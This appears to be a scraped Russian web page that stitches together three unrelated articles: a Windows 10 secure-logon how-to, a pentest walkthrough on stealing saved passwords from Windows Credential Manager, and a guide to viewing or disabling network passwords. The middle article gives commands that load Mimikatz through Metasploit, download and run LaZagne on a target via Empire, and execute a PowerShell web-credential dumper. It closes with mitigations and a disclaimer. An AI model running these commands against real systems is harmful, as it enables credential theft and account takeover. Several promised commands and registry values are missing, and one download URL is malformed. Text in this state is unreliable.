Как включить или отключить безопасный вход в Windows 10
Windows является самой целевой операционной системой на планете. Это означает, что Вы должны укрепить защиту своего ПК, чтобы обеспечить безопасность как в сети, так и в автономном режиме. В этом руководстве показано, как включить или отключить безопасный вход для Windows 10.
Безопасный вход является дополнительным компонентом на экране входа в Windows 10. Это не мешает кому-либо получить доступ к Вашему компьютеру, если у есть Ваши учетные данные. Вместо этого Windows 10 удаляет поля входа в систему, пока Вы не введете строку ключей. После этого введите свой пароль или PIN-код, как обычно.
Эта функция направлена на предотвращение вредоносных программ. Вредоносный код может находиться в фоновом режиме и подделывать экран входа в Windows 10, чтобы захватить Ваши учетные данные. Поскольку приложения и программы, как правило, не имеют доступа к команде Ctrl + At + Del, Вы можете обойти ложный экран входа в систему с помощью безопасного входа, который активируется при вводе этой команды.
Включить или отключить с помощью команды Netplwiz
Для запуска откройте окно «Выполнить», одновременно нажав клавиши «Windows» и «R» (Windows + R). Появится небольшое всплывающее окно. Введите «netplwiz» (без кавычек) в текстовое поле и затем нажмите кнопку «ОК» (или нажмите клавишу Enter), чтобы продолжить.
Кроме того, Вы можете получить доступ к панели «Учетные записи пользователей», введя «netplwiz» в поле поиска на панели задач и выбрав команду «Выполнить».
Панель учетных записей пользователей появится на экране. Перейдите на вкладку «Дополнительно» (если она не открыта по умолчанию). Найдите параметр «Требовать нажатия Ctrl + Alt + Delete», указанный в разделе «Безопасный вход». Установите флажок для включения или снимите, чтобы отключить.
Нажмите кнопку «Применить», а затем кнопку «ОК» для завершения.
Включить или отключить использование локальной политики безопасности
Вот еще один метод, который несколько труднее, чем следовать инструкциям по учетным записям. Используйте этот метод, если Вы хотите выбрать трудный маршрут, но избегаете реестра Windows.
Запустите команду «Выполнить», одновременно нажав клавиши «Windows» и «R» (Windows + R). Появится небольшое всплывающее окно. Введите «secpol.msc» (без кавычек) в текстовое поле и затем нажмите кнопку «ОК» (или нажмите клавишу Enter), чтобы продолжить.
Как и раньше, Вы также можете получить доступ к панели «Локальная политика безопасности», введя «secpol.msc» в поле поиска на панели задач и выбрав в результате классическое приложение.
В окне локальной политики безопасности разверните «Локальные политики», находящиеся слева, и выберите подпапку «Параметры безопасности» внизу. Затем прокрутите вниз справа и дважды щелкните запись «Интерактивный вход в систему: не требовать CTRL + ALT + DEL».
Панель свойств записи отобразится на экране, и по умолчанию отобразится вкладка «Параметр локальной безопасности». Нажмите переключатель, чтобы включить или отключить эту функцию. Завершите, нажав кнопку «Применить», а затем кнопку «ОК».
Включить или отключить безопасный вход, используя реестр
Если Вы хотите пойти по хардкорному маршруту, почему бы не отредактировать реестр? Помните, действуйте осторожно: любые внесенные Вами изменения могут вызвать нестабильность системы. Этот вариант для опытных людей, которые любят копаться в Windows.
Запустите команду «Выполнить», одновременно нажав клавиши «Windows» и «R» (Windows + R). Появится небольшое всплывающее окно. Введите «regedit» (без кавычек) в текстовое поле и затем нажмите кнопку «ОК» (или нажмите клавишу Enter), чтобы продолжить.
Вы также можете получить доступ к редактору реестра, введя «regedit» в поле поиска на панели задач и выбрав в результате классическое приложение.
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows NT > CurrentVersion
В папке CurrentVersion выберите запись «Winlogon», чтобы отобразить ее настройки на панели справа. Дважды щелкните запись «DisableCad», чтобы изменить ее значения.
Во всплывающем окне «Изменение параметра DWORD (32 бита)» измените значение данных одним из следующих значений:
Нажмите кнопку «ОК», чтобы закончить. Перезагрузите компьютер, чтобы сохранить настройки.
Примечание. Если Вы не видите запись «DisableCad» в настройках «Winlogon», щелкните правой кнопкой мыши «Winlogon», выберите «Создать» во всплывающем меню и нажмите «Параметр DWORD (32 бита)» в списке. Назовите этот новый DWORD как «DisableCAD» (без кавычек) и измените его значение.
Получение учетных данных: Windows Credential Manager
В этой статье рассказывается о получении учетных данных из Windows Credential Manager, приводятся различные методы, которые могут быть использованы как во внутреннем, так и во внешнем пентестинге.
Знакомство с Credential Manager
Credential Manager (диспетчер учетных данных) был представлен впервые на Windows 7. Он похож на цифровое хранилище для хранения всех учетных данных пользователя в безопасности. Они расположены в папке учетных данных, которую можно найти здесь – %Systemdrive%\Users\ \AppData\Local\Microsoft\Credentials , и именно к этой папке обращается Credential Manager. Он также позволяет добавлять, редактировать, удалять, создавать резервные копии и даже восстанавливать пароли.
Учетные данные, сохраненные в Credential Manager, бывают двух типов:
- Веб-учетные данные : поскольку Edge и Windows являются продуктами одной и той же компании, Credential Manager также имеет доступ к хранящейся информации в браузере, чтобы повысить сохранность учетных данных. Он хранит пароли приложений, предоставленных Microsoft, например, Skype, Microsoft Office и т.д.
- Учетные данные Windows : здесь можно найти все учетные данные для входа в систему Windows. Это касается любой системы, которая подключена к сети.
Приложения, запущенные Windows и хранящие учетные данные пользователя, будут автоматически отображены в Credential Manager. Даже когда пользователь обновляет их, изменения моментально вносятся в диспетчер учетных данных.
Получение доступа к Credential Manager
Для получения доступа к диспетчеру учетных данных, пользователь может просто найти его в меню Пуск или открыть программу с помощью следующих двух методов:
- Панель управления > Учетные записи пользователей > Диспетчер учетных данных
- С помощью командной строки: ввести команду vaultcmd и воспользоваться ее возможностями
При имеющемся подключении к другой системе в сети можно использовать любой из способов, приведенных ниже.
При подключении, когда пользователь вводит пароль и сохраняет его для последующего использования, его учетные данные сохраняются в диспетчере учетных данных.
Независимо от веб-сайта и его политик безопасности, когда человек сохраняет пароль в Edge или любом другом приложении, таком как Skype или Outlook, эти данные также заносятся и в Credential Manager. Например, пользователь сохранил пароль от Gmail, как показано на рисунке ниже:
Теперь пользователь может убедиться в том, что пароль был действительно сохранен.
Пользователь получает доступ к Credential Manager, используя любой уже упомянутый метод. Он обнаруживает, что на вкладке учетные данные Windows хранятся все системные и сетевые пароли.
А на вкладке веб-учетные данные будут показаны пароли приложений и сохраненные в Еdge.
Metasploit
Все эти учетные данные могут быть получены с помощью простых методов. Как только был установлен сеанс Metasploit, все, что нужно сделать, это загрузить Mimikatz и запустить его. Mimikatz – это удивительный инструмент для получения учетных данных.
Чтобы запустить его удаленно с помощью сеанса Metasploit, следует использовать следующую команду:
Как только Mimikatz выполнит свою работу, пользователь получит учетные данные, сохраненные в Credential Manager, как показано на рисунке выше.
Empire
Аналогичным образом, с помощью Empire, пользователь может получить учетные данные путем загрузки Lazagne.exe непосредственно в целевую систему, а затем нужно манипулировать этой утилитой. LaZange – это один из самых популярных инструментов для получения учетных данных.
Нужно использовать следующие команды для сброса учетных данных с помощью этого метода:
shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all
После выполнения команд пользователь может увидеть, что пароли были получены, как показано на рисунке ниже:
CredentialsFileView
Следующий метод заключается в использовании стороннего инструмента – CredentialsFileView. Эта утилита очень эффективна, когда речь заходит о пентестинге. Чтобы использовать данный инструмент, следует просто скачать и запустить его. После запуска он запросит у пользователя пароль Windows.
Как только человек введет пароль, инструмент предоставит ему все необходимые учетные данные, как показано на рисунке ниже:
Windows PowerShell
Этот метод получения паролей может оказаться полезным как во внутреннем, так и во внешнем пентестинге. Во время него пользователь запускает скрипт в Windows PowerShell, его можно найти, перейдя по ссылке . Как только человек откроет скрипт, он получит все веб-учетные данные, как показано на картинке ниже:
Пользователь может применить PowerShell удаленно для получения учетных данных с помощью Metasploit. Это очень просто, так как всего лишь необходимо выполнить комбинацию следующих команд после завершения сеанса:
load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials
И с помощью команд PowerShell пользователь и получит нужные ему учетные данные.
Митигирование
Ниже приведены меры, которые могут быть использованы для обеспечения безопасности паролей пользователя:
- Не стоит хранить пароли в системе, браузере или любом другом приложении
- Следует использовать разные пароли для каждой учетной записи
- Если у пользователя возникли проблемы с запоминанием паролей, то вместо того, чтобы хранить их в виде открытого текста в системе, нужно использовать онлайн-менеджер паролей
- Надо загрузить последнюю версию операционной системы и приложений
- Вручную переходить на страницу входа в систему, а не по какой-то ссылке
- Постоянно пользоваться защитой межсетевого экрана
- Держать своих сотрудников или работодателей в курсе всех происходящих событий
Важно ! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.
Как узнать сетевой пароль своего компьютера и где его отключить?
Здравствуйте, дорогие друзья! Сегодняшняя тема будет для тех, кто пользуется компьютерными локальными сетями. При попытке подключения к любому ПК из группы необходимо постоянно прописывать специальный код – сетевой пароль. Бывают ситуации, когда эти данные забываются. Для такого случая я здесь – наша статья расскажет, как узнать сетевой пароль на самых популярных нынче ОС – Windows 7 и 10.
Где можно управлять паролями?
Например, вам нужно выполнить настройку общего доступа к принтеру в сети, а операционная система при этом запрашивает код доступа. Как узнать сетевой пароль своего компьютера, где вообще его можно найти?
Чтобы получить доступ ко всем паролям на ПК под Windows 7 и 10, нужно:
- Вызываем приложение «Выполнить» комбинацией кнопок Win + R;
- Прописываем команду netplwiz;
- Откроется окошко «Учетные записи пользователей»;
- Перейдите на вкладку «Дополнительно»;
- Нажмите «Управление паролями», чтобы получить доступ ко всем хранящимся на этом компьютере паролям.
Здесь можно удалить или поменять данные, добавить учетную запись.
Если у вас Windows XP, команда для «Выполнить» будет другая – control userpasswords2.
Как посмотреть?
Как узнать сетевой пароль от домашней группы (сам код), расскажу на примере Windows 10:
- В «Панели управления» режим просмотра ставим по категориям;
- Переходим в раздел «Сеть и Интернет»;
- Заходим в «Домашнюю группу»;
- В ее настройках ищем пункт «Показать или распечатать пароль домашней группы»;
- Переписываем нужные данные на листочек или запоминаем.
Пока писала, поняла, что у пользователей часто возникают проблемы при просмотре кода. Если у вас тоже не получается узнать пароль от локальной сети по моей инструкции, напишите в комментарии!
Возможная проблема
Бывает такое, что код не установлен, а система все равно его требует. Или выскакивает сообщение, что сетевой пароль указан неверно, хотя он точно правильный. Что делать в таком случае (на примере «семерки»):
- Чтобы запустить редактор локальной групповой политики, открываем «Выполнить» и прописываем gpedit.msc;
- Теперь поочередно заходим в разделы из следующего списка: «Конфигурация компьютера» – «Конфигурация Windows» – «Параметры безопасности» – «Локальные политики» – «Параметры безопасности» – «Сетевая безопасность: уровень проверки подлинности LAN Manager»;
- Отмечаем пункт «Отправлять LM и NTML…».
Этот способ решения проблемы работает не на всех версиях Windows 7!
Как убрать запрос на ввод кода?
Видео-инструкции по теме раздела смотрите тут:
Если в вашей домашней группе всего несколько устройств, и вы уверены в ее безопасности, ввод кода можно убрать. Как отключить запрос сетевого пароля на Windows 7/10, расскажу сейчас:
- Заходим в «Панель управления»;
- Режим просмотра ставим на «Крупные значки»;
- Переходим в раздел «Центр управления сетями…»;
- В дополнительных параметрах (раздел слева) ищем «Общий (текущий профиль)»;
- Ищем «Общий доступ к общедоступным папкам» и ставим галочку напротив «Включить общий доступ…»;
- Выбираем строку «Общий доступ с парольной защитой»;
- Отмечаем пункт «Отключить общий доступ с парольной защитой»;
- Сохраняем изменения соответствующей кнопкой.
Здесь тоже пробежалась по отзывам, оказывается, помогает не всем. Если у вас тоже возникла проблема, напишите нам, подумаем, что можно сделать.
Как не сохранять?
Можно сделать, чтобы операционная система не сохраняла коды. В какой ситуации это может пригодиться, не знаю, но такая инструкция есть (на примере Windows 7):
- В «Панели управления» зайдите в раздел «Администрирование»;
- Откройте «Локальная политика безопасности»;
- Нажмите «Параметры безопасности», перейдите на вкладку «Локальные политики», а затем в «Параметры безопасности»;
- В списке справа найдите строку «Сетевой доступ: не разрешать хранение паролей…», кликните ПКМ и перейдите в «Свойства»;
- На вкладке «Параметр локальной безопасности» поставьте галочку у пункта «Отключен»;
- После выполненных операций сохраните изменения кнопкой OK.
Вот такая сложная тема. На «десятке» узнать сетевой пароль намного проще, чем на «семерке». У Windows 7 много версий, и что работает на одной, для другой не подходит. Но у вас всегда есть команда WiFiGid, которая постарается решить любой вопрос. Спасибо за доверие!